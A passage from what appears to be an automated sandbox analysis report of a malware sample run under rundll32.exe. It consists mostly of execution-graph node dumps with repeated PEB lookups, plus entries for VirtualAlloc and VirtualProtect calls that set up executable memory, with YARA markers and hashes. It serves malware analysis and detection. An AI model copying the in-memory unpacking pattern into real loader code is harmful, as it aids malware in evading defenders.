1fffada 3806->3830 3834 200b0ac 3806->3834 3838 20045e3 3806->3838 3809->3806 3810->3617 3811->3806 3813->3806 3815 1ff68ec GetPEB 3814->3815 3816 1ffe8d4 3815->3816 3816->3617 3842 2000f0d 3817->3842 3827 1ff28cb 3822->3827 3823 1ffe81f GetPEB 3823->3827 3824 1ff2b4a 3826 1ffe761 GetPEB 3824->3826 3828 1ff2b48 3826->3828 3827->3823 3827->3824 3827->3828 3849 1ff2dc4 3827->3849 3853 2001dec 3827->3853 3828->3617 3831 1fffb1b 3830->3831 3832 1ff68ec GetPEB 3831->3832 3833 1fffbc5 3832->3833 3833->3806 3835 200b0ca 3834->3835 3836 1ff68ec GetPEB 3835->3836 3837 200b155 3836->3837 3837->3806 3839 20045f3 3838->3839 3840 1ff68ec GetPEB 3839->3840 3841 2004693 3840->3841 3841->3806 3843 1ff68ec GetPEB 3842->3843 3844 2000fb3 3843->3844 3845 200600e 3844->3845 3846 2006027 3845->3846 3847 1ff68ec GetPEB 3846->3847 3848 2001444 3847->3848 3848->3617 3850 1ff2df4 3849->3850 3851 1ff68ec GetPEB 3850->3851 3852 1ff2e94 3851->3852 3852->3827 3854 2001e09 3853->3854 3855 1ff68ec GetPEB 3854->3855 3856 2001ea4 3855->3856 3856->3827 4310 1ff8f63 4311 1ff902d 4310->4311 4312 1ff9006 4310->4312 4316 2009665 4312->4316 4328 2009bf5 4316->4328 4317 1ff3c8e GetPEB 4317->4328 4318 1ff5370 GetPEB 4318->4328 4319 1ffd54c GetPEB 4319->4328 4320 1ff4cc9 GetPEB 4320->4328 4322 2000339 GetPEB 4322->4328 4323 2009df7 4324 1ff598b GetPEB 4323->4324 4325 1ff9019 4324->4325 4325->4311 4329 1fffa3b 4325->4329 4326 20002e1 GetPEB 4326->4328 4327 1ff9a4b GetPEB 4327->4328 4328->4317 4328->4318 4328->4319 4328->4320 4328->4322 4328->4323 4328->4325 4328->4326 4328->4327 4332 1ff74bf 4328->4332 4330 1ff68ec GetPEB 4329->4330 4331 1fffacf 4330->4331 4331->4311 4333 1ff74d8 4332->4333 4334 1ff68ec GetPEB 4333->4334 4335 1ff7564 4334->4335 4335->4328 4340 200819f 4352 2008601 4340->4352 4341 200880e 4343 1ffe761 GetPEB 4341->4343 4342 200b63c GetPEB 4342->4352 4345 200880c 4343->4345 4346 1ffd3f5 GetPEB 4346->4352 4347 1ffd54c GetPEB 4347->4352 4349 1ff4a6f GetPEB 4349->4352 4350 1ff74bf GetPEB 4350->4352 4351 1ffb340 GetPEB 4351->4352 4352->4341 4352->4342 4352->4345 4352->4346 4352->4347 4352->4349 4352->4350 4352->4351 4353 1ffa25a 4352->4353 4357 2001ac5 4352->4357 4354 1ffa28b 4353->4354 4355 1ff68ec GetPEB 4354->4355 4356 1ffa308 4355->4356 4356->4352 4358 2001ad8 4357->4358 4359 1ff68ec GetPEB 4358->4359 4360 2001b9a 4359->4360 4360->4352 4361 200c5a1 4367 200c913 4361->4367 4362 1ff598b GetPEB 4362->4367 4363 1ff3c8e GetPEB 4363->4367 4364 200ca48 4365 1ff5370 GetPEB 4365->4367 4366 200ca55 GetPEB 4366->4367 4367->4362 4367->4363 4367->4364 4367->4365 4367->4366 4368 1ff8e39 GetPEB 4367->4368 4369 20002e1 GetPEB 4367->4369 4368->4367 4369->4367 3857 1ffe8dd 3858 1ffe9c8 3857->3858 3859 200c4a5 GetPEB 3858->3859 3864 1ffea0a 3858->3864 3860 1ffe9e0 3859->3860 3865 1ff2eac 3860->3865 3863 20002e1 GetPEB 3863->3864 3866 1ff2ec9 3865->3866 3868 1ff2fdf 3866->3868 3869 2001a0b 3866->3869 3868->3863 3870 2001a27 3869->3870 3871 1ff68ec GetPEB 3870->3871 3872 2001ab6 3871->3872 3872->3866 3873 1ffb8d8 3885 1ffbcfd 3873->3885 3875 1ffbe61 3878 1ffb340 GetPEB 3875->3878 3876 1ffbe5f 3880 1ffbe79 3878->3880 3927 20046f7 3880->3927 3882 1ff5370 GetPEB 3882->3885 3885->3875 3885->3876 3885->3882 3886 1ff9a4b GetPEB 3885->3886 3887 20002e1 GetPEB 3885->3887 3888 20038c2 3885->3888 3897 1ffea16 3885->3897 3901 1ff6ae5 3885->3901 3904 200c15b 3885->3904 3918 1ff30e8 3885->3918 3886->3885 3887->3885 3891 2003af1 3888->3891 3890 2003c12 3892 1ff502c GetPEB 3890->3892 3891->3890 3893 2003c10 3891->3893 3931 1fff481 3891->3931 3935 2002982 3891->3935 3939 1ff502c 3891->3939 3943 1fff895 3891->3943 3892->3893 3893->3885 3898 1ffea33 3897->3898 3899 1ff68ec GetPEB 3898->3899 3900 1ffeace 3899->3900 3900->3885 3902 1ff68ec GetPEB 3901->3902 3903 1ff6b85 3902->3903 3903->3885 3905 200c178 3904->3905 3906 1ff4cc9 GetPEB 3905->3906 3907 200c401 3906->3907 3908 1ff4cc9 GetPEB 3907->3908 3909 200c41b 3908->3909 3910 1ff4cc9 GetPEB 3909->3910 3911 200c430 3910->3911 3947 1fff965 3911->3947 3914 1fff965 GetPEB 3915 200c467 3914->3915 3951 1ffdac8 3915->3951 3920 1ff33e2 3918->3920 3919 1ff5370 GetPEB 3919->3920 3920->3919 3923 1ff3412 3920->3923 3924 20002e1 GetPEB 3920->3924 3926 1ff3423 3920->3926 3959 200144e 3920->3959 3963 1fffff8 3920->3963 3955 2006643 3923->3955 3924->3920 3926->3885 3928 200470a 3927->3928 3929 1ff68ec GetPEB 3928->3929 3930 200479f 3929->3930 3930->3876 3932 1fff491 3931->3932 3933 1ff68ec GetPEB 3932->3933 3934 1fff522 3933->3934 3934->3891 3936 2002997 3935->3936 3937 1ff68ec GetPEB 3936->3937 3938 2002a3f 3937->3938 3938->3891 3940 1ff5042 3939->3940 3941 1ff68ec GetPEB 3940->3941 3942 1ff50e5 3941->3942 3942->3891 3944 1fff8b1 3943->3944 3945 1ff68ec GetPEB 3944->3945 3946 1fff955 3945->3946 3946->3891 3948 1fff97e 3947->3948 3949 1ff68ec GetPEB 3948->3949 3950 1fffa2c 3949->3950 3950->3914 3952 1ffdadb 3951->3952 3953 1ff68ec GetPEB 3952->3953 3954 1ffdb7b 3953->3954 3954->3885 3956 2006653 3955->3956 3957 1ff68ec GetPEB 3956->3957 3958 20066ef 3957->3958 3958->3926 3960 2001464 3959->3960 3961 1ff68ec GetPEB 3960->3961 3962 20014ee 3961->3962 3962->3920 3964 2000032 3963->3964 3965 1ff68ec GetPEB 3964->3965 3966 20000e3 3965->3966 3966->3920 4370 2007fa7 4371 1ff96ca GetPEB 4370->4371 4372 200811d 4371->4372 4373 1ff96ca GetPEB 4372->4373 4374 200812a 4373->4374 4375 1ff96ca GetPEB 4374->4375 4376 2008141 4375->4376 4379 1fffdef 4376->4379 4380 1fffe2b 4379->4380 4381 1ffff22 4380->4381 4382 1ffeadd GetPEB 4380->4382 4382->4380 4387 1ffc851 4394 1ffcb2e 4387->4394 4388 200c15b GetPEB 4388->4394 4389 1ffcc3b 4397 2003d29 4389->4397 4390 1ffcc39 4391 1ffd54c GetPEB 4391->4394 4393 1ff5370 GetPEB 4393->4394 4394->4388 4394->4389 4394->4390 4394->4391 4394->4393 4395 1ff9a4b GetPEB 4394->4395 4396 20002e1 GetPEB 4394->4396 4395->4394 4396->4394 4398 2003d46 4397->4398 4399 1ff5370 GetPEB 4398->4399 4400 2003ef5 4399->4400 4407 1ffe231 4400->4407 4403 20002e1 GetPEB 4404 2003f25 4403->4404 4411 1ffe092 4404->4411 4408 1ffe250 4407->4408 4409 20036c4 GetPEB 4408->4409 4410 1ffe26a 4409->4410 4410->4403 4412 1ffe0a5 4411->4412 4413 1ff68ec GetPEB 4412->4413 4414 1ffe130 4413->4414 4414->4390 3971 2007132 3973 2007195 3971->3973 3974 1ff7405 GetPEB 3973->3974 3975 2007f7f 3973->3975 3979 1ff4a6f GetPEB 3973->3979 3981 2007f99 3973->3981 3982 1ff5370 GetPEB 3973->3982 3986 20002e1 GetPEB 3973->3986 3987 1ffd3f5 GetPEB 3973->3987 3990 2001933 3973->3990 3994 1ff95e8 3973->3994 3998 200b869 3973->3998 4001 2007065 3973->4001 4005 1ff92a3 3973->4005 4014 1ff6737 3973->4014 4018 1ffe272 3973->4018 4025 2003c35 3973->4025 4029 1ffedc7 3973->4029 3974->3973 4033 1ff7405 3975->4033 3979->3973 3982->3973 3986->3973 3987->3973 3991 200195c 3990->3991 3992 1ff68ec GetPEB 3991->3992 3993 20019ed 3992->3993 3993->3973 3995 1ff9607 3994->3995 3996 1ff68ec GetPEB 3995->3996 3997 1ff96a5 3996->3997 3997->3973 4037 1ff3aeb 3998->4037 4002 2007093 4001->4002 4003 1ff68ec GetPEB 4002->4003 4004 2007119 4003->4004 4004->3973 4006 1ff94b4 4005->4006 4008 1ff95b5 4006->4008 4011 1ff4a6f GetPEB 4006->4011 4012 1ff58e8 GetPEB 4006->4012 4013 1ffd3f5 GetPEB 4006->4013 4041 2002a4e 4006->4041 4009 1ffd3f5 GetPEB 4008->4009 4010 1ff95cc 4008->4010 4009->4010 4010->3973 4011->4006 4012->4006 4013->4006 4015 1ff6754 4014->4015 4016 1ff68ec GetPEB 4015->4016 4017 1ff6807 4016->4017 4017->3973 4023 1ffe28f 4018->4023 4019 1ffe4bd 4021 1ffe67c GetPEB 4019->4021 4020 1ffe4bb 4020->3973 4021->4020 4022 1ff4a6f GetPEB 4022->4023 4023->4019 4023->4020 4023->4022 4045 1ffe67c 4023->4045 4026 2003c5f 4025->4026 4027 1ff68ec GetPEB 4026->4027 4028 2003d14 4027->4028 4028->3973 4030 1ffede9 4029->4030 4031 1ff68ec GetPEB 4030->4031 4032 1ffee75 4031->4032 4032->3973 4034 1ff7418 4033->4034 4035 1ff68ec GetPEB 4034->4035 4036 1ff74b4 4035->4036 4036->3981 4038 1ff3b14 4037->4038 4039 1ff68ec GetPEB 4038->4039 4040 1ff3ba6 4039->4040 4040->3973 4042 2002a6d 4041->4042 4043 1ff68ec GetPEB 4042->4043 4044 2002ae7 4043->4044 4044->4006 4046 1ffe6a8 4045->4046 4047 1ff68ec GetPEB 4046->4047 4048 1ffe747 4047->4048 4048->4023 4049 2009333 4052 200949b 4049->4052 4050 1ffb340 GetPEB 4050->4052 4052->4050 4054 2009569 4052->4054 4055 2000241 4052->4055 4058 1ff9a99 4052->4058 4066 1ff2353 4055->4066 4059 1ff9ab9 4058->4059 4085 20028cc 4059->4085 4062 1ff9c32 4062->4052 4065 1ffe761 GetPEB 4065->4062 4070 1ff2374 4066->4070 4069 1ff2684 4071 1ffe761 GetPEB 4069->4071 4070->4069 4072 1ff2682 4070->4072 4074 2001eb2 4070->4074 4078 20020dc 4070->4078 4081 2000b97 4070->4081 4071->4072 4072->4052 4075 2001ecb 4074->4075 4076 1ff68ec GetPEB 4075->4076 4077 2001f6c 4076->4077 4077->4070 4079 1ff68ec GetPEB 4078->4079 4080 200216b 4079->4080 4080->4070 4082 2000bb0 4081->4082 4083 1ff68ec GetPEB 4082->4083 4084 2000c47 4083->4084 4084->4070 4086 1ff68ec GetPEB 4085->4086 4087 1ff9bfe 4086->4087 4087->4062 4088 2001111 4087->4088 4089 200112c 4088->4089 4090 1ff68ec GetPEB 4089->4090 4091 1ff9c1e 4090->4091 4091->4065 4092 2000437 4093 200044e 4092->4093 4094 2000536 4093->4094 4095 1ff4a6f GetPEB 4093->4095 4095->4093 4419 1ff9846 4420 1ff99a8 4419->4420 4421 1ff4a6f GetPEB 4420->4421 4422 1ff99bc 4420->4422 4425 1ff99dc 4420->4425 4426 1ff9772 4420->4426 4421->4420 4424 1ff85b2 GetPEB 4422->4424 4424->4425 4427 1ff978d 4426->4427 4428 1ff68ec GetPEB 4427->4428 4429 1ff9838 4428->4429 4429->4420 4430 20090be 4431 2000f0d GetPEB 4430->4431 4432 2009275 4431->4432 4433 1ff4a6f GetPEB 4432->4433 4436 2009319 4432->4436 4434 20092f8 4433->4434 4435 1fff965 GetPEB 4434->4435 4434->4436 4435->4436 4437 20034bf 4439 20035ca 4437->4439 4438 20036a7 4439->4438 4440 200a6d9 GetPEB 4439->4440 4441 1ff598b GetPEB 4439->4441 4442 20036a9 4439->4442 4444 1ff4a6f GetPEB 4439->4444 4440->4439 4441->4439 4443 1ffd3f5 GetPEB 4442->4443 4443->4438 4444->4439 4096 200e740 4097 200e620 VirtualAlloc 4096->4097 4098 200e74d 4097->4098 4099 1ff38be 4102 200bba5 4099->4102 4103 200bbbe 4102->4103 4104 1ff68ec GetPEB 4103->4104 4105 1ff394c 4104->4105 4106 1ffb6b9 4111 1ffb85f 4106->4111 4107 1ffb8cd 4108 1ffd3f5 GetPEB 4108->4111 4109 200bba5 GetPEB 4109->4111 4110 2009e33 GetPEB 4110->4111 4111->4107 4111->4108 4111->4109 4111->4110 4112 1ffe761 GetPEB 4111->4112 4112->4111 4116 1ff3db8 4117 2000f0d GetPEB 4116->4117 4125 1ff4196 4117->4125 4118 1ff42d3 4120 200c15b GetPEB 4118->4120 4119 1ff42d1 4120->4119 4121 1ff5370 GetPEB 4121->4125 4122 1ff96ca GetPEB 4122->4125 4123 1ff9a4b GetPEB 4123->4125 4124 200b060 GetPEB 4124->4125 4125->4118 4125->4119 4125->4121 4125->4122 4125->4123 4125->4124 4126 20002e1 GetPEB 4125->4126 4126->4125 4127 1ffd5b8 4134 1ffd85a 4127->4134 4128 1ffd9e5 4131 20011d8 GetPEB 4128->4131 4130 1ffd3f5 GetPEB 4130->4134 4132 1ffd9e3 4131->4132 4134->4128 4134->4130 4134->4132 4137 2000339 4134->4137 4140 2000604 4134->4140 4147 2001719 4134->4147 4151 1ff6a1b 4134->4151 4138 1ff68ec GetPEB 4137->4138 4139 20003d6 4138->4139 4139->4134 4141 200061d 4140->4141 4142 1ff91b4 GetPEB 4141->4142 4143 1ff4a6f GetPEB 4141->4143 4144 2000829 4141->4144 4146 200084e 4141->4146 4142->4141 4143->4141 4155 1ff91b4 4144->4155 4146->4134 4148 2001735 4147->4148 4149 1ff68ec GetPEB 4148->4149 4150 20017cf 4149->4150 4150->4134 4152 1ff6a34 4151->4152 4153 1ff68ec GetPEB 4152->4153 4154 1ff6ad6 4153->4154 4154->4134 4156 1ff91e2 4155->4156 4157 1ff68ec GetPEB 4156->4157 4158 1ff928a 4157->4158 4158->4146 4159 200bc4d 4160 200bc65 4159->4160 4161 1ff4a6f GetPEB 4160->4161 4162 1ff2353 GetPEB 4160->4162 4164 200c127 4160->4164 4165 200c125 4160->4165 4166 200189f GetPEB 4160->4166 4168 1fff965 GetPEB 4160->4168 4169 1ffd3f5 GetPEB 4160->4169 4170 1ff6ca5 4160->4170 4161->4160 4162->4160 4164->4165 4167 1ffd3f5 GetPEB 4164->4167 4166->4160 4167->4164 4168->4160 4169->4160 4175 1ff6ccb 4170->4175 4171 1ff6fc7 4173 200aebe GetPEB 4171->4173 4172 1ff6fc5 4172->4160 4173->4172 4174 1ff4a6f GetPEB 4174->4175 4175->4171 4175->4172 4175->4174 4177 200aebe 4175->4177 4178 200aef8 4177->4178 4179 1ff68ec GetPEB 4178->4179 4180 200af95 4179->4180 4180->4175 4449 1ffef2e 4450 1ffef53 4449->4450 4453 1ff4a6f GetPEB 4450->4453 4454 1fff44c 4450->4454 4455 1fff439 4450->4455 4459 1ff58e8 GetPEB 4450->4459 4460 1ff4b2a 4450->4460 4464 2000558 4450->4464 4467 1ff3bbc 4450->4467 4471 1ff6818 4450->4471 4453->4450 4455->4454 4458 1ffd3f5 GetPEB 4455->4458 4458->4454 4459->4450 4461 1ff4b53 4460->4461 4462 1ff68ec GetPEB 4461->4462 4463 1ff4bf3 4462->4463 4463->4450 4465 1ff68ec GetPEB 4464->4465 4466 20005f8 4465->4466 4466->4450 4468 1ff3be2 4467->4468 4469 1ff68ec GetPEB 4468->4469 4470 1ff3c76 4469->4470 4470->4450 4472 1ff6838 4471->4472 4473 1ff68ec GetPEB 4472->4473 4474 1ff68da 4473->4474 4474->4450 4475 1fff52e 4476 1ffb340 GetPEB 4475->4476 4477 1fff69d 4476->4477 4478 1ff74bf GetPEB 4477->4478 4479 1fff6b4 4478->4479 4480 1fff6ed 4479->4480 4484 1ff2b70 4479->4484 4483 1ffe092 GetPEB 4483->4480 4485 1ff2b90 4484->4485 4486 1ff5370 GetPEB 4485->4486 4487 1ff2cde 4486->4487 4488 1ff9a4b GetPEB 4487->4488 4489 1ff2cfc 4488->4489 4490 20002e1 GetPEB 4489->4490 4491 1ff2d0e 4490->4491 4491->4483 4181 1ff70ad 4186 1ff70d5 4181->4186 4182 1ff73d6 4184 1ffb046 GetPEB 4182->4184 4183 1ff73d4 4184->4183 4185 1ff4a6f GetPEB 4185->4186 4186->4182 4186->4183 4186->4185 4187 1ffd4fe GetPEB 4186->4187 4187->4186 4492 1ff3523 4494 1ff363f 4492->4494 4495 1ff3677 4494->4495 4497 1ffaf66 4494->4497 4501 2001d13 4494->4501 4498 1ffaf7c 4497->4498 4499 1ff68ec GetPEB 4498->4499 4500 1ffb00b 4499->4500 4500->4494 4502 2001d29 4501->4502 4503 1ff68ec GetPEB 4502->4503 4504 2001de0 4503->4504 4504->4494 4505 20003df 4506 1ff4a6f GetPEB 4505->4506 4507 2000424 4506->4507 4191 1ff9d95 4194 1ffa07d 4191->4194 4192 1ffd54c GetPEB 4192->4194 4193 1ff4a6f GetPEB 4193->4194 4194->4192 4194->4193 4196 2002982 GetPEB 4194->4196 4197 1ffa24d 4194->4197 4198 1ff502c GetPEB 4194->4198 4199 1ff3c8e GetPEB 4194->4199 4200 20014fc 4194->4200 4196->4194 4198->4194 4199->4194 4201 200163c 4200->4201 4202 1fff965 GetPEB 4201->4202 4203 1ffd54c GetPEB 4201->4203 4204 200189f GetPEB 4201->4204 4205 200170e 4201->4205 4202->4201 4203->4201 4204->4201 4205->4194 4210 1fff793 4212 1fff857 4210->4212 4213 1ff27ec GetPEB 4210->4213 4213->4212 4218 1ff498c 4219 1ff49aa 4218->4219 4220 1ff4a6f GetPEB 4219->4220 4222 1ff4a3c 4220->4222 4221 1ff4a64 4222->4221 4223 1ffd3f5 GetPEB 4222->4223 4223->4221 4227 1ffdb86 4231 1ffde20 4227->4231 4228 1ffd4fe GetPEB 4228->4231 4229 1ff96ca GetPEB 4229->4231 4230 1ffdf2e 4231->4228 4231->4229 4231->4230 4232 2008f9b GetPEB 4231->4232 4232->4231 4233 2002179 4235 200242a 4233->4235 4234 1ffb340 GetPEB 4234->4235 4235->4234 4236 20024e6 4235->4236 4237 1ff5370 GetPEB 4235->4237 4238 1ff9a4b GetPEB 4235->4238 4239 20002e1 GetPEB 4235->4239 4237->4235 4238->4235 4239->4235 4516 1ff4304 4520 1ff476b 4516->4520 4517 2003805 GetPEB 4517->4520 4518 1ff4964 4519 1ff5370 GetPEB 4519->4520 4520->4517 4520->4518 4520->4519 4521 1ff9a4b GetPEB 4520->4521 4522 1ff4966 4520->4522 4523 200b63c GetPEB 4520->4523 4525 20002e1 GetPEB 4520->4525 4527 200373e 4520->4527 4521->4520 4524 1ffe761 GetPEB 4522->4524 4523->4520 4524->4518 4525->4520 4528 200375e 4527->4528 4529 1ff68ec GetPEB 4528->4529 4530 20037f3 4529->4530 4530->4520 4531 20066fb 4535 2006cc7 4531->4535 4532 1ffeadd GetPEB 4532->4535 4533 1ff58e8 GetPEB 4533->4535 4534 2006ee6 4536 200c4a5 GetPEB 4534->4536 4535->4532 4535->4533 4535->4534 4538 1ff96ca GetPEB 4535->4538 4540 1ff4a6f GetPEB 4535->4540 4543 1ffe4f3 GetPEB 4535->4543 4544 2006ed9 4535->4544 4545 200c4a5 GetPEB 4535->4545 4547 20002e1 GetPEB 4535->4547 4548 1ffc801 4535->4548 4537 2006eff 4536->4537 4552 1ffdf4a 4537->4552 4538->4535 4540->4535 4542 20002e1 GetPEB 4542->4544 4543->4535 4545->4535 4547->4535 4549 1ffc829 4548->4549 4550 20036c4 GetPEB 4549->4550 4551 1ffc849 4550->4551 4551->4535 4553 1ffdf66 4552->4553 4554 20036c4 GetPEB 4553->4554 4555 1ffdf82 4554->4555 4555->4542 4556 20000fe 4557 1ff5370 GetPEB 4556->4557 4558 2000211 4557->4558 4563 2003f43 4558->4563 4561 20002e1 GetPEB 4562 2000238 4561->4562 4564 2003f53 4563->4564 4565 1ff68ec GetPEB 4564->4565 4566 200021f 4565->4566 4566->4561

                                                                      Executed Functions

                                                                      Function 0200EB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0200EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0200EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 93bc48649f92dfcf26019eda0e3dd7e14f12c4e7a20aef5dacdd6f668383b569
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 80C1BA75A00209DFDB48CF98C590EAEB7B6FF88304F148559E909AB395D735EA42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0200E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 9e09dd9492fedc1b47c7ba33d58183c8f095eaf9715e47c36af46791fee0c01b
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 10113D60D08389EAFF01D7E8D449BFEBFB55B11704F044498D5847A282D2BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2416 Parent PID: 2512 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:942
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 3385 1e371e 3386 1e3745 3385->3386 3389 1e68ec 3386->3389 3390 1e37dd 3389->3390 3391 1e69d8 3389->3391 3395 1ef797 3391->3395 3393 1e69ee 3398 1fba51 3393->3398 3402 1e27ec GetPEB 3395->3402 3397 1ef857 3397->3393 3400 1fba71 3398->3400 3399 1fbb6d 3399->3390 3400->3399 3403 1e177c 3400->3403 3402->3397 3404 1e1905 3403->3404 3411 1f95b0 3404->3411 3408 1e1949 3409 1e197a 3408->3409 3410 1fba51 GetPEB 3408->3410 3409->3399 3410->3409 3412 1f95c9 3411->3412 3413 1e68ec GetPEB 3412->3413 3414 1e192f 3413->3414 3414->3408 3415 1ee5c0 3414->3415 3416 1ee5d3 3415->3416 3417 1e68ec GetPEB 3416->3417 3418 1ee671 3417->3418 3418->3408 4298 1f819f 4308 1f8601 4298->4308 4299 1f880e 4301 1ee761 GetPEB 4299->4301 4300 1fb63c GetPEB 4300->4308 4303 1f880c 4301->4303 4304 1ed3f5 GetPEB 4304->4308 4305 1ed54c GetPEB 4305->4308 4307 1e4a6f GetPEB 4307->4308 4308->4299 4308->4300 4308->4303 4308->4304 4308->4305 4308->4307 4309 1e74bf GetPEB 4308->4309 4310 1eb340 GetPEB 4308->4310 4311 1ea25a 4308->4311 4315 1f1ac5 4308->4315 4309->4308 4310->4308 4312 1ea28b 4311->4312 4313 1e68ec GetPEB 4312->4313 4314 1ea308 4313->4314 4314->4308 4316 1f1ad8 4315->4316 4317 1e68ec GetPEB 4316->4317 4318 1f1b9a 4317->4318 4318->4308 3423 1f2515 3424 1f2529 3423->3424 3425 1f2722 3424->3425 3432 1f6158 3424->3432 3444 1fb165 3424->3444 3454 1ea323 3424->3454 3473 1fcc7f 3424->3473 3483 1e1983 3424->3483 3496 1f34c3 3424->3496 3433 1f64a7 3432->3433 3435 1f6628 3433->3435 3440 1f6626 3433->3440 3504 1e4a6f 3433->3504 3509 1e3c8e 3433->3509 3513 1e5370 3433->3513 3517 1e9a4b 3433->3517 3521 1f02e1 3433->3521 3525 1e598b 3433->3525 3535 1fa6d9 3433->3535 3548 1ed3f5 3435->3548 3440->3424 3450 1fb4a0 3444->3450 3445 1e4a6f GetPEB 3445->3450 3446 1fb624 3447 1ed3f5 GetPEB 3446->3447 3448 1fb610 3447->3448 3448->3424 3450->3445 3450->3446 3450->3448 3638 1f9e33 3450->3638 3642 1e85b2 3450->3642 3646 1e50f1 3450->3646 3654 1f0fbc 3450->3654 3679 1ef6fa 3454->3679 3456 1e5370 GetPEB 3469 1eaba3 3456->3469 3457 1eaf45 3462 1ed3f5 GetPEB 3457->3462 3460 1eaf43 3460->3424 3461 1fb060 GetPEB 3461->3469 3462->3460 3463 1ed3f5 GetPEB 3463->3469 3464 1f02e1 GetPEB 3464->3469 3465 1fa6d9 GetPEB 3465->3469 3466 1e4a6f GetPEB 3466->3469 3467 1ee761 GetPEB 3467->3469 3469->3456 3469->3457 3469->3460 3469->3461 3469->3463 3469->3464 3469->3465 3469->3466 3469->3467 3470 1e598b GetPEB 3469->3470 3472 1e3c8e GetPEB 3469->3472 3682 1f08cf 3469->3682 3689 1f189f 3469->3689 3693 1e39e1 3469->3693 3697 1e4d48 3469->3697 3470->3469 3472->3469 3481 1fcf95 3473->3481 3474 1f9e33 GetPEB 3474->3481 3475 1fd120 3476 1ed3f5 GetPEB 3475->3476 3477 1fd10c 3476->3477 3477->3424 3478 1e4a6f GetPEB 3478->3481 3479 1e85b2 GetPEB 3479->3481 3480 1e50f1 GetPEB 3480->3481 3481->3474 3481->3475 3481->3477 3481->3478 3481->3479 3481->3480 3482 1f0fbc GetPEB 3481->3482 3482->3481 3495 1e205f 3483->3495 3484 1e2335 3487 1ed3f5 GetPEB 3484->3487 3486 1e2321 3486->3424 3487->3486 3488 1e4a6f GetPEB 3488->3495 3490 1fa6d9 GetPEB 3490->3495 3493 1e598b GetPEB 3493->3495 3494 1ee761 GetPEB 3494->3495 3495->3484 3495->3486 3495->3488 3495->3490 3495->3493 3495->3494 3711 1f891e 3495->3711 3720 1ee81f 3495->3720 3723 1f1372 3495->3723 3728 1e28aa 3495->3728 3498 1f35ca 3496->3498 3497 1fa6d9 GetPEB 3497->3498 3498->3497 3499 1f36a7 3498->3499 3500 1f36a9 3498->3500 3501 1e598b GetPEB 3498->3501 3503 1e4a6f GetPEB 3498->3503 3499->3424 3502 1ed3f5 GetPEB 3500->3502 3501->3498 3502->3499 3503->3498 3554 1e7015 3504->3554 3510 1e3cb4 3509->3510 3511 1e68ec GetPEB 3510->3511 3512 1e3d4c 3511->3512 3512->3433 3514 1e538b 3513->3514 3515 1e4a6f GetPEB 3514->3515 3516 1e53fd 3515->3516 3516->3433 3516->3516 3518 1e9a72 3517->3518 3561 1f36c4 3518->3561 3522 1f02f3 3521->3522 3523 1ed3f5 GetPEB 3522->3523 3524 1f0332 3523->3524 3524->3433 3526 1e59b9 3525->3526 3564 1e4cc9 3526->3564 3531 1e5c48 3531->3433 3534 1ee761 GetPEB 3534->3531 3546 1fabdd 3535->3546 3536 1fadb1 3536->3433 3538 1e5370 GetPEB 3538->3546 3540 1fadb3 3541 1ee761 GetPEB 3540->3541 3541->3536 3544 1f02e1 GetPEB 3544->3546 3546->3536 3546->3538 3546->3540 3546->3544 3584 1ed54c 3546->3584 3588 1eb340 3546->3588 3592 1f1ba5 3546->3592 3600 1f5f20 3546->3600 3604 1fb060 3546->3604 3608 1fb63c 3546->3608 3549 1ed408 3548->3549 3550 1e7015 GetPEB 3549->3550 3551 1ed4e4 3550->3551 3634 1e3011 3551->3634 3555 1e68ec GetPEB 3554->3555 3556 1e4b11 3555->3556 3557 1e90d2 3556->3557 3558 1e90ec 3557->3558 3559 1e68ec GetPEB 3558->3559 3560 1e4b22 3559->3560 3560->3433 3562 1e68ec GetPEB 3561->3562 3563 1e9a91 3562->3563 3563->3433 3565 1e4ce1 3564->3565 3576 1eff2c 3565->3576 3568 1fade2 3569 1fae1e 3568->3569 3570 1e68ec GetPEB 3569->3570 3571 1e5c3d 3570->3571 3571->3531 3572 1ee761 3571->3572 3573 1ee777 3572->3573 3574 1e68ec GetPEB 3573->3574 3575 1e5c68 3574->3575 3575->3534 3577 1eff45 3576->3577 3580 1fd7a6 3577->3580 3581 1fd7c1 3580->3581 3582 1e68ec GetPEB 3581->3582 3583 1e4d40 3582->3583 3583->3568 3585 1ed563 3584->3585 3612 